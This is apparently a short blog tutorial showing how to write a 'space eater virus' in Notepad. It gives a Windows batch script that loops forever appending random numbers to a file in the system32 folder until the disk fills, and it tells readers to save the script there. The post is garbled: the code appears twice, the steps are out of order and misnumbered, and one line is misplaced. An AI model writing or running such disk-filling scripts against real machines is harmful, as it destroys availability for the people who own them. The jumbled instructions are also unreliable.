In this module i will show how to make a space eater virus in notepad.
title Space Eater Virus
:a
echo %random%%random%%random%%random%%random%>>%homedrive%/WINDOWS/system32/spv.txt
goto a
4. Now save it in C:/WINDOWS/system32/spv.bat.
- First press win+r.
- Then type notepad and press enter.
- @echo off
title Space Eater Virus
:a
echo %random%%random%%random%%random%%random%>>%homedrive%/WINDOWS/system32/spv.txt
goto a
4. Now save it in C:/WINDOWS/system32/spv.bat.
No comments:
Post a Comment